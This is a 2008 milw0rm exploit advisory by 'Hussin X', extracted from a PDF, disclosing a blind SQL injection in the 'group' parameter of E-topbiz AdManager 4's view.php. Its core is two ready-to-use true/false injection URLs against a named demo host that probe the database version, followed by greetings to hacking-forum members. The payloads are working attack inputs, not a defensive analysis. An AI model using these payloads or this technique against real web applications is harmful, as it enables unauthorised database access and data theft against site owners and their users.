Etopbiz AdManager 4 group Blind SQL Injection Vulnerability.pdf

1 E−topbiz AdManager 4 (group) Blind SQL Injection Vulnerability 2 ___________________________________ 3 4 Author: Hussin X 5 6 Home : www.IQ−TY.com & www.TrYaG.cc 7 8 ___________________________________ 9 10 script : http://e−topbiz.com/oprema/pages/admanager4.php 11 12 Demo : 13 _______ 14 true & false 15 16 http://e−topbiz.com/trafficdemos/admanager4/view.php?group=4+and%20substring(@@version,1,1)=4 17 http://e−topbiz.com/trafficdemos/admanager4/view.php?group=4+and%20substring(@@version,1,1)=5 18 19 Version = 4 :) 20 21 22 23 24 25 ____________________________( Greetz )_________________________________ 26 | 27 | All members of the Forum| WwW.IQ−ty.CoM | WwW.TrYaG.CC | 28 | 29 | My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | Sakab 30 | 31 | Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber−Zone | G4N0K| 32 |_____________________________________________________________________ 33 34 35 Im IRAQi | Im TrYaGi 36 37 # milw0rm.com [2008−11−17] Page 1/1 Etopbiz AdManager 4 group Blind SQL Injection Vulnerability Hussin X 11/17/2008